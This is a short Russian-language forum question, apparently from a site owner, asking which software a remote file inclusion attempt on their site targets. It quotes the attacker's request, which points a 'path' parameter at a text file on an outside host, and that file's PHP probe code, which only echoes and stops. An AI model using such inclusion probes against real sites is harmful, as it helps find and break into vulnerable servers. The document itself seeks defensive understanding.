Парень под названием ShiroHige пытается взломать мой сайт.
Он пытается открыть страницу с этим параметром:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
Если вы посмотрите на этот текстовый файл, это просто die()
,
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
Так какой эксплойт он пытается использовать (WordPress?)?
Изменить 1:
Я знаю, что он пытается использовать RFI.
Есть ли какой-нибудь популярный script, который можно использовать с этим (Drupal, phpBB и т.д.)?